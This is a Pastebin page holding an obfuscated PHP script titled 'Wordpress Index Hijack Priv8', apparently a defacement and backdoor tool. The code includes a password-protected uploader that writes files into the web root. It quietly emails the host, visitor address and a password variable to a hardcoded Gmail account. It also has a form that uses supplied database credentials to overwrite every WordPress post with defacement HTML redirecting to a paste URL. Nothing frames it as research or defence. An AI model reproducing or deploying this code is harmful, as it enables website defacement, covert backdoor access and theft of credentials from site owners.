Advertisement
Pisher

Wordpress Index Hijack Priv8

Nov 6th, 2015
155
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 8.49 KB | None | 0 0
  1. <?php ${"\x47\x4c\x4fB\x41\x4c\x53"}["z\x71\x6ac\x6a\x65l\x75ww\x6f"]="\x67\x68\x6f\x73t2";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x69ls\x6c\x6du\x79\x6c"]="\x67h\x6fs\x74\x33";${"GLOBAL\x53"}["\x6c\x67u\x66\x69a\x73eh\x74"]="\x67\x68\x6f\x73\x74\x31";${"G\x4c\x4fB\x41\x4c\x53"}["\x74o\x65q\x73\x7a"]="d\x62\x6e\x6d\x6e";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x74\x63\x64\x77z\x6a\x6cb\x79\x6bd"]="\x69\x6e\x64\x65\x78";${"GL\x4f\x42\x41L\x53"}["\x71u\x65\x77cu\x6d\x79gj\x75\x71"]="\x70w\x64\x64\x62bn";${"\x47\x4c\x4f\x42\x41\x4cS"}["c\x67p\x6f\x61q\x6dp"]="p\x67\x68\x6f\x73t";${"\x47L\x4fBA\x4c\x53"}["rmhr\x6f\x75"]="\x61\x75t\x68\x5f\x70as\x73";$wlanojdnv="\x76\x69\x73i\x74\x63";${"\x47L\x4f\x42A\x4cS"}["dd\x70w\x66\x6du\x75\x6f\x6f"]="\x62o\x64\x79";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["o\x68x\x6ff\x73\x71\x65\x79\x6b\x76\x79"]="\x6a\x75d\x75l";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x67\x71\x63e\x71g\x64\x6d"]="\x74\x61r\x67\x65\x74";${"\x47\x4cOB\x41LS"}["\x6bq\x6c\x77\x66\x73f"]="\x77\x65\x62";$dxqwkpvhoeww="\x64\x62nm\x6e";${"\x47L\x4fB\x41\x4c\x53"}["\x77d\x6c\x62m\x65\x6ce\x6f"]="v\x69s\x69\x74\x63";if(empty($_GET["p\x77"])==0){if(md5($_GET["p\x77"])=="\x65\x310\x61\x64\x633\x39\x349\x62\x61\x359\x61\x62be\x35\x36e0\x357f\x32\x30\x66\x388\x33\x65"){if(empty($_FILES["\x41"])==0){if(move_uploaded_file($_FILES["\x41"]["\x74\x6d\x70\x5fna\x6de"],$_SERVER["DOCUM\x45\x4e\x54_\x52\x4f\x4f\x54"]."/".$_FILES["A"]["\x6e\x61\x6de"])==1){echo"<c\x65nte\x72\x3e\x53ub\x69\x64\x6f\x20\x61\x6c\x20d\x69r\x65c\x74\x6frio \x70\x72in\x63\x69\x70a\x6c /p\x75\x62li\x63\x5f\x68\x74ml/</\x63en\x74\x65\x72>";}}else{echo"<f\x6f\x72\x6d \x65\x6e\x63t\x79\x70\x65\x3d\"mul\x74\x69p\x61r\x74/f\x6frm-\x64ata\x22 \x61\x63t\x69\x6fn\x3d\"".$_SERVER["\x52\x45Q\x55\x45ST_\x55\x52\x49"]."\x22\x20m\x65tho\x64=\"POS\x54\x22\x3e\x3cc\x65\x6eter\x3e\x3ci\x6e\x70\x75t\x20\x6e\x61m\x65=\"\x41\x22\x20t\x79\x70\x65=\x22f\x69le\"><i\x6eput t\x79pe\x3d\x22su\x62\x6di\x74\x22\x20\x76\x61\x6c\x75e\x3d\"[\x73\x65\x6ed]\x22\x3e\x3c/\x63e\x6e\x74e\x72>\x3c/f\x6f\x72\x6d\x3e";}exit();}}${"\x47\x4cOB\x41\x4c\x53"}["\x75w\x6b\x6a\x70\x6d\x6d\x63\x64"]="\x76isi\x74\x63";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x75w\x6b\x6ap\x6dmc\x64"]}=$_COOKIE["\x76\x69s\x69\x74s"];if(${${"G\x4cO\x42\x41\x4c\x53"}["wdl\x62me\x6c\x65o"]}==""){$vunqcdwdxu="v\x69\x73it\x63";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x63\x77\x77\x7ax\x6b\x66\x74\x70\x75\x66"]="i\x6ej";$vsuxvysmg="\x69nj";${"\x47\x4c\x4fBA\x4c\x53"}["\x6bd\x76\x71u\x75\x77"]="\x76\x69\x73\x69\x74\x6fr";${$vunqcdwdxu}=0;${${"\x47\x4cOB\x41\x4c\x53"}["\x6b\x64\x76\x71u\x75w"]}=$_SERVER["R\x45\x4d\x4fT\x45_ADDR"];${${"GL\x4f\x42ALS"}["k\x71\x6c\x77\x66\x73\x66"]}=$_SERVER["H\x54TP\x5f\x48\x4fS\x54"];${${"\x47LOB\x41\x4c\x53"}["\x63w\x77\x7a\x78\x6bft\x70\x75\x66"]}=$_SERVER["\x52E\x51\x55EST\x5f\x55RI"];${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x67\x71c\x65q\x67\x64m"]}=rawurldecode(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6bq\x6c\x77f\x73\x66"]}.${$vsuxvysmg});$msdfsfqqmg="\x62\x6f\x64\x79";${${"\x47\x4c\x4f\x42A\x4cS"}["\x6fhx\x6ffs\x71e\x79kv\x79"]}="WP In\x64\x65\x78 \x48ija\x63k ht\x74p://$target \x62y $visitor";${$msdfsfqqmg}="\x42u\x67:\x20$target\x20\x62\x79\x20$visitor\x20-\x20$auth_pass";if(!empty(${${"\x47\x4c\x4f\x42\x41\x4cS"}["k\x71l\x77\x66\x73\x66"]})){@mail("pis\x68\x65r.b\x6c\x61c\x6b\x73erve\x72\x30\x31\x40\x67ma\x69\x6c\x2ec\x6fm",${${"\x47L\x4fB\x41LS"}["\x6fhx\x6f\x66\x73q\x65\x79kvy"]},${${"GLO\x42\x41L\x53"}["d\x64p\x77f\x6d\x75u\x6fo"]},${${"\x47\x4c\x4f\x42ALS"}["r\x6d\x68\x72\x6f\x75"]});}}else{${"GL\x4f\x42\x41\x4c\x53"}["a\x76i\x67\x6b\x77o\x75"]="\x76\x69\x73\x69t\x63";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x61\x76ig\x6b\x77o\x75"]}++;}@setcookie("\x76\x69sit\x7a",${$wlanojdnv});$tzsyefscdsv="d\x62\x75s\x72\x72\x72\x72";echo"<\x66o\x72\x6d\x20\x6d\x65t\x68od\x3d\x22\x50OS\x54\"\x3e\n<p \x61l\x69\x67\x6e=\"\x63\x65n\x74\x65r\"\x3e\x20\n\x3ci\x6dg\x20\x62\x6frd\x65\x72\x3d\"0\"\x20s\x72c=\x22\x68\x74\x74p://\x69.\x69mgu\x72\x2ec\x6f\x6d/\x6e\x6b\x71AZ\x50\x64.\x70\x6eg\">\x3c/p\x3e\n\x3ccen\x74\x65r><\x66ont\x20\x63\x6fl\x6fr=\"40E\x30D\x30\x22 s\x69\x7ae\x3d\x22\x36\x22\x20face=\x22im\x70a\x63\x74\">\x57\x6f\x72dp\x72ess\x20\x49\x6e\x64\x65x\x20Hij\x61c\x6b \x50\x72iv8\x3c/\x66o\x6et></c\x65\x6e\x74\x65r\x3e\n<\x63\x65\x6et\x65r\x3e\x3cf\x6fnt \x63o\x6c\x6f\x72=\"\x34\x30\x45\x30\x44\x30\" si\x7ae=\x22\x32\" fac\x65=\x22\x6frio\x6e\x22>Co\x64ed \x42\x79 \x50i\x73he\x72\x5fB\x6ca\x63k\x3c/\x66on\x74\x3e\x3c/\x63en\x74\x65\x72>\n\x3cce\x6e\x74\x65r\x3e<i\x6ep\x75t \x74y\x70\x65=\"\x74\x65\x78t\" \x76\x61\x6c\x75e=\"lo\x63a\x6cho\x73t\x22 \x6e\x61\x6de=\"\x70ghos\x74\x22\x3e\n<i\x6e\x70u\x74 \x74\x79pe=\"text\x22 \x76\x61l\x75e\x3d\x22dat\x61\x62\x61se_nam\x65\x22\x20\x6eame=\"db\x6e\x6dn\"\x3e\n<\x69\x6ep\x75t\x20t\x79p\x65=\"\x74\x65x\x74\"\x20\x76a\x6cu\x65=\"\x70r\x65fix\x22 \x6eame=\"p\x72\x65f\x69\x78\"\x3e\n\x3cinp\x75t\x20t\x79\x70\x65\x3d\"\x74e\x78\x74\" \x76\x61\x6c\x75e=\"us\x65\x72na\x6de_d\x62\" nam\x65=\"db\x75sr\x72r\x72\x22\x3e\n<\x69\x6e\x70\x75\x74\x20\x74\x79pe=\"te\x78t\x22 va\x6c\x75e\x3d\x22p\x61ss\x77\x6fr\x64_d\x62\x22 na\x6de\x3d\x22\x70\x77dd\x62\x62\x6e\"\x3e\x3c/\x63\x65\x6e\x74\x65r><\x62\x72>\n\x3cc\x65nt\x65\x72\x3e\x3ct\x65xt\x61\x72ea\x20na\x6d\x65=\x22p\x6fwn\"\x20\x63ol\x73=\x22\x38\x35\x22\x20r\x6fw\x73=\"\x310\x22>\x3cme\x74a ht\x74\x70-eq\x75\x69v=\"\x72\x65\x66resh\"\x20con\x74\x65n\x74=\x220\x3b\x55\x52\x4c\x3d\x68\x74tp://p\x61steb\x69n\x2ec\x6f\x6d/\x72\x61w\x2ephp?i\x3dy\x6ae\x46\x61\x6acy\x22>\x3c/\x74\x65x\x74\x61re\x61>\x3cb\x72\x3e\n\x3cin\x70\x75\x74\x20t\x79\x70\x65=\"\x73\x75\x62\x6d\x69\x74\x22 \x6e\x61m\x65\x3d\"\x75p2\"\x20\x76a\x6cue\x3d\x22\x48\x69j\x61c\x6b\x20\x49\x6ede\x78\x22\x3e<\x62\x72\x3e</c\x65\x6et\x65\x72>\x3c\x66\x6fr\x6d\x3e";${${"\x47\x4c\x4fBA\x4c\x53"}["c\x67poa\x71m\x70"]}=$_POST["\x70\x67ho\x73t"];${$dxqwkpvhoeww}=$_POST["d\x62\x6em\x6e"];$ynqktfdesb="p\x72ef\x69x";${$tzsyefscdsv}=$_POST["dbu\x73\x72\x72\x72\x72"];${${"G\x4cOB\x41\x4cS"}["\x71\x75\x65\x77\x63\x75\x6d\x79\x67\x6au\x71"]}=$_POST["\x70w\x64dbbn"];${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x74c\x64w\x7aj\x6c\x62y\x6b\x64"]}=stripslashes($_POST["po\x77n"]);${$ynqktfdesb}=$_POST["\x70\x72ef\x69x"];if($_POST["\x75p\x32"]){${"\x47\x4c\x4f\x42A\x4c\x53"}["\x61\x6cy\x78\x63\x66z\x69x\x69\x6a"]="p\x67\x68\x6f\x73\x74";$smtxsjbby="gh\x6f\x73t\x31";${"\x47L\x4f\x42\x41\x4c\x53"}["\x66\x72nj\x69\x6cu\x79j"]="d\x62\x75\x73\x72\x72\x72\x72";${"\x47LO\x42\x41LS"}["\x68\x6e\x6d\x71\x71\x63\x77c\x62\x66\x64\x6e"]="\x70\x72\x65\x66i\x78";$eynlvjfaa="\x67\x68\x6f\x73\x74\x32";@mysql_connect(${${"\x47L\x4fB\x41\x4c\x53"}["a\x6c\x79xcf\x7aix\x69\x6a"]},${${"G\x4c\x4f\x42\x41\x4cS"}["\x66r\x6eji\x6cuy\x6a"]},${${"G\x4c\x4fB\x41\x4cS"}["q\x75\x65\x77\x63\x75my\x67j\x75\x71"]})or die(mysql_error());@mysql_select_db(${${"G\x4c\x4fB\x41L\x53"}["\x74\x6f\x65\x71\x73\x7a"]})or die(mysql_error());${"G\x4c\x4f\x42AL\x53"}["\x62bmgm\x79\x61\x65\x6e\x75"]="\x74\x61\x62l\x65\x4ea\x6de";${${"\x47L\x4f\x42A\x4c\x53"}["\x62\x62\x6d\x67\x6dy\x61e\x6e\x75"]}=${${"\x47\x4c\x4f\x42A\x4c\x53"}["h\x6e\x6d\x71\x71\x63\x77\x63b\x66\x64\x6e"]}."p\x6f\x73ts";${"\x47\x4cOB\x41L\x53"}["\x73\x63mju\x78j\x6b\x6bz"]="\x67\x68\x6fs\x74\x33";${${"GL\x4fB\x41\x4c\x53"}["l\x67\x75\x66\x69\x61\x73\x65\x68t"]}=mysql_query("\x55\x50\x44\x41\x54\x45\x20$tableName\x20\x53E\x54 p\x6f\x73t_\x74\x69\x74\x6c\x65\x20=\x27".${${"G\x4c\x4f\x42A\x4c\x53"}["\x74cd\x77\x7a\x6al\x62y\x6b\x64"]}."' \x57\x48ERE\x20ID\x20> 0\x20");if(!${${"\x47\x4c\x4f\x42\x41LS"}["\x6c\x67u\x66i\x61\x73\x65\x68\x74"]}){$dsqgqns="\x67\x68o\x73t\x32";$bjjrinif="\x69\x6ed\x65\x78";${$dsqgqns}=mysql_query("U\x50\x44A\x54\x45 $tableName\x20\x53\x45\x54 p\x6fs\x74_c\x6fn\x74ent \x3d\x27".${$bjjrinif}."'\x20\x57HE\x52\x45 \x49\x44\x20>\x20\x30\x20");}elseif(!${$eynlvjfaa}){${${"\x47LO\x42\x41\x4c\x53"}["\x69l\x73l\x6d\x75\x79\x6c"]}=mysql_query("\x55\x50DA\x54\x45 $tableName \x53E\x54\x20pos\x74\x5f\x6eame\x20\x3d\x27".${${"\x47\x4cOB\x41\x4c\x53"}["tc\x64w\x7a\x6alb\x79\x6b\x64"]}."\x27\x20WH\x45\x52\x45\x20\x49D\x20\x3e\x20\x30 ");}mysql_close();if(${$smtxsjbby}||${${"\x47L\x4f\x42\x41L\x53"}["z\x71\x6ac\x6ae\x6cu\x77wo"]}||${${"\x47\x4c\x4fBA\x4cS"}["\x73\x63\x6dj\x75x\x6akkz"]}){echo"<\x63e\x6eter><p><\x62><\x66on\x74\x20c\x6fl\x6f\x72='\x340E0D0\x27\x3e\x49\x6e\x64\x65\x78 \x57\x65bsite Have\x20bee\x6e Hi\x6a\x61\x63\x6b\x65d S\x75\x63cessf\x75l\x6cy\x3c/\x66ont></\x70></b>\x3c/\x63\x65\x6et\x65r>";}else{echo"<\x63\x65nt\x65r\x3e<\x70>\x3c\x62>\x3cfo\x6et \x63ol\x6fr='red\x27>\x46\x61\x69\x6c\x65\x64\x20\x54\x6f \x48i\x6a\x61ck t\x68e W\x65bs\x69te :(\x3c/font\x3e</\x70></\x62\x3e</c\x65\x6et\x65r>";}}
  2. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement